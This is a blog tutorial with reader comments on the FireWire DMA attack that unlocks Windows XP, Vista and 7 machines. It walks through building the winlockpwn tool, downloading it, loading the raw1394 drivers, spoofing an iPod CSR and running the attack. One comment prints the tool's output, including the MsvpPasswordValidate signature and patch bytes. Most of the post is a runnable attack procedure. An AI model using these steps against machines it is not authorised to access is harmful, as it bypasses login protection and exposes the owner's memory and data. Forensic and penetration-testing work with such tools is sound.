Update: I’ve released a tool at github called Inception, which uses libforensic1394 to unlock Windows XP, Vista and Windows 7 boxes. IMNSHO, it is much more stable than winlockpwn, easier to use and works against a wider spectrum of target operating systems.
Quite regularly I’m asked to demonstrate the FireWire attack made by MetlStorm aka Adam Boileau (http://www.storm.net.nz/projects/16 [site down as of May 20]), where an attacker unlocks a Windows machine by writing to the victim machine’s memory via FireWire. It’s kind of a party trick hack, but it never ceases to amaze people. A couple of days ago I demonstrated the trick at AFSecurity, and I was asked if it was easy to find a good description of how to do it.
Well, sort of. There’s an excellent guide here, but several of the commands do not work out of the box on Ubuntu anymore, so I’ve created this little tutorial. All hail to Tim for creating the original. Also, the original source of the tool has disappeared from the net, so I’ve started hosting my own version of the tool right here. Metlstorm, if you read this, apologies in advance. Let me buy you a beer sometime! Or get your site up again :-)
So here’s how to do the hack on Ubuntu 10.10 (Maverick Meerkat) (the guide originally said Ubuntu 11.04 (Natty Narwhal), which was a typo; see the update below):
(Update: According to this thread, the raw1394 device is no longer supported as of Ubuntu 11.04, I’ll try to figure out how to use the tool with the new FireWire stack (JuJu)).
Get the dependencies
First, get the stuff we need to be able to compile the winlockpwn tool and necessary FireWire driver:
sudo apt-get install build-essential linux-headers-$(uname -r) libdc1394-22 libraw1394-dev swig
Secondly, we need to download and compile Python 2.3:
wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvfz Python-2.3.6.tgz
cd Python-2.3.6
./configure
Now, since this old Python version has several potential buffer overflows that gcc’s default stack-protector and _FORTIFY_SOURCE hardening trips over, we have to tell gcc to turn those checks off by editing the Makefile. Open the Makefile in your favourite text editor, and change the following line:
BASECFLAGS= -fno-strict-aliasing
To:
BASECFLAGS= -fno-strict-aliasing -fno-stack-protector -U_FORTIFY_SOURCE
Then compile and make an alternative install (that will make the new (old) python libraries co-reside nicely with your existing python libraries):
make
sudo make altinstall
Fix up the libraw1394:
sudo vim /usr/include/libraw1394/raw1394.h
Search for and comment out all references to the ‘__attribute__ ((deprecated));’ and be sure to put an ending semicolon on the previous line.
Download and install winlockpwn
Since Adam Boileau’s site is down, I’ve taken the liberty of hosting the tool files here. I’ve also added some more csr’s and signatures for Windows XP SP3, Vista 32 and 64-bit, Ubuntu 9.04 and Windows 7 32 and 64-bit. Woohoo!
wget http://www.breaknenter.org/files/winlockpwn/pythonraw1394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget http://www.breaknenter.org/files/winlockpwn/winlockpwn
chmod +x ./winlockpwn
vim Makefile (reference /usr/local/bin/python2.3 instead of /usr for python)
make
Unload the default Ubuntu FireWire drivers and load your own:
sudo modprobe -r firewire_ohci
sudo modprobe -r firewire_core
sudo modprobe ohci1394
sudo modprobe raw1394
Give write permissions to the firewire device:
sudo chmod 666 /dev/raw1394
Edit the first line of the files romtool, businfo and winlockpwn to reference the python 2.3 location as installed above, then load the ipod image (or any of the other csr’s) to the firewire port:
sudo ./romtool -s 0 ipod.csr
Run businfo to check the port configurations:
sudo ./businfo
Check the node list. Node 0 is the Windows machine, node 1 should be the fake iPod. Connect to the Windows machine using a FireWire cable, and watch as Windows loads the FireWire drivers, recognizes the iPod and gives it DMA. At last, run winlockpwn (example parameters below):
sudo ./winlockpwn 0 0 2
You can get a quick explanation of the winlockpwn parameters by running the command without parameters. If you’re having trouble getting DMA access, try some of the other ROM csr’s. Also, verify that no other firewire drivers (than the ones loaded above) are present by issuing the following commands:
lsmod | grep 1394
lsmod | grep firewire
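To make that last check less error-prone, here is an added helper (not part of the original post or of winlockpwn) that classifies lsmod output as the legacy ieee1394 stack winlockpwn needs, the newer juju stack, or both loaded at once (the conflict the guide warns about); the lsmod text embedded in it is a constructed sample.

```shell
#!/bin/sh
# Added example: classify which Linux FireWire stack `lsmod` shows as loaded.
# Reads lsmod-formatted text on stdin (first column is the module name) and
# prints one word:
#   legacy - old ieee1394 stack (ohci1394/raw1394), the one winlockpwn expects
#   juju   - new firewire_core/firewire_ohci stack (default from Ubuntu 11.04)
#   mixed  - both stacks loaded at once, which is the conflict to resolve first
#   none   - no FireWire driver loaded
# Exit status is 1 for "mixed", 0 otherwise.
fw_stack_classify() {
    legacy=0
    juju=0
    while read -r name _; do
        case "$name" in
            ohci1394|raw1394|ieee1394|sbp2) legacy=1 ;;
            firewire_core|firewire_ohci|firewire_sbp2) juju=1 ;;
        esac
    done
    if [ "$legacy" -eq 1 ] && [ "$juju" -eq 1 ]; then
        echo mixed
        return 1
    elif [ "$legacy" -eq 1 ]; then
        echo legacy
    elif [ "$juju" -eq 1 ]; then
        echo juju
    else
        echo none
    fi
    return 0
}

# Constructed sample lsmod output (not captured from a real host), chosen to
# show the conflicting case. On a real box run:  lsmod | fw_stack_classify
SAMPLE_LSMOD='Module                  Size  Used by
firewire_ohci          40960  0
firewire_core          65536  1 firewire_ohci
crc_itu_t              16384  1 firewire_core
raw1394                28672  0'

printf '%s\n' "$SAMPLE_LSMOD" | fw_stack_classify \
    || echo "both FireWire stacks are loaded; unload one before continuing"
```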

nino
Hi Carsten
I’ve just updated to 11.04 and I’m having issues getting the raw1394 module to load:
sudo modprobe raw1394
FATAL: Module raw1394 not found.
raw1394 is definitely installed:
sudo apt-get install libraw1394-dev
Reading package lists… Done
Building dependency tree
Reading state information… Done
libraw1394-dev is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 174 not upgraded.
I’d appreciate it if you could give me some pointers!
Carsten
Did you issue the modprobe command from the directory where you compiled winlockpwn? You should have a ‘raw1394.ko’ kernel module there if I’m not mistaken, but I’ll check when I have access to my Ubuntu box.
nino
Hi Carsten
I only have:
raw1394.i
raw1394.pyc
raw1394_wrap.c
There isn’t a raw1394.ko anywhere on the system; apparently the support has been removed from the later kernels.
I’m giving a demo tomorrow so I might need to format and go back down to 9.10 :(
Carsten
Haven’t tried the tool on the newest ubuntu release yet (there was a typo in the guide stating that it was for Natty, while I’ve only tested this on Ubuntu 10.10 (Maverick Meerkat)), so unfortunately I’m unable to help you. But I’ll check today if I can make it work on Natty as well.
I’m currently developing my own tool that is much more stable, although it’s unfinished. It’s available at github in a pre-alpha release: https://github.com/carmaa/FTWAutopwn
It only includes signatures for Win7 at the moment, but you can copy other signatures from the winlockpwn tool.
It requires python3.2 and libforensic1394, check the readme file.
Vishal
Hello Carsten,
I am working on my research project on the Forensic Firewire topic but when I run the following command as:
sudo modprobe ohci1394
sudo modprobe raw1394
It gives me error as “Module raw1394 not found”.
Can you please help me out, what’s my mistake?
Thanks..
Carsten
Check out my tool FTWAutopwn instead
Vishal
Hello Carsten,
As per your suggestion I used the “ftwautopwn” tools and the procedure suggested by you, but after the complete attack I get an output as “Attack Unsuccessful” as no signature was found. I tried this on Mac Book Pro (Snow Leopard 10.6.8) and even on Windows 7 SP1 Home Edition.
Can you please help me for the same. Because I am stuck on the same. Actually my main task is to capture the RAM memory (volatile memory) but I am unsuccessful. Can you please help me I will be very thankful to you.
Please reply ASAP.
Thanks
Leidy
That insight’s perfect for what I need. Thanks!
Carsten
Tried winlockpwn on Natty last night, didn’t pan out. Seems like the new FW stack doesn’t include raw1394 anymore. Let me do some digging to see if it’s possible to fetch the old stack from somewhere and load it.
firedart
I’m having trouble getting FTWautopwn to work on BackTrack 5. Could you possibly provide step-by-step instructions for getting it working from a fresh install of Backtrack5 please? Including how to install Python 3.2.1 and libforensic1394 to the right place, where to put ftwautopwn.py, what other files I need from your github page etc. My linux skills are poor!
Carsten
Will do! I’m currently moving to the US so that’s why it’s been quiet here on the blog for a while. In a couple of weeks I’ll post a newer version of the tool including a tutorial.
Carsten
This guide should work for BT5 also, please let me know if it doesn’t.
jan
I am having trouble getting this to work. The SBP2 device shows up in the device manager of the target machine, as well as a disk drive (UNKNOWN VENDOR AND MODEL) with a yellow question mark on it. It says ‘cannot start’. The error I get is:
Please select target (or enter ‘q’ to quit): 6
[+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
Phase 1:
Using signature: 0x83f8107511b0018b
Using patch: 0x83f8109090b0018b
Using offset: 0x8aa (2218)
Phase 2:
Using signature: 0x83f8107511b0018b
Using patch: 0x83f8109090b0018b
Using offset: 0x862 (2146)
Traceback (most recent call last):SBP2, please wait 1 seconds or press Ctrl+C
  File "./ftwautopwn.py", line 80, in <module>
    main(sys.argv[1:])
  File "./ftwautopwn.py", line 76, in main
    unlock.run(ctx)
  File "/home/jan/FTWAutopwn/ftwautopwn/unlock.py", line 129, in run
    d = initialize_fw(d)
  File "/home/jan/FTWAutopwn/ftwautopwn/unlock.py", line 254, in initialize_fw
    d = b.devices()[0]
IndexError: list index out of range
Any ideas?
jan
Ignore my post. Wrong forum. Sorry.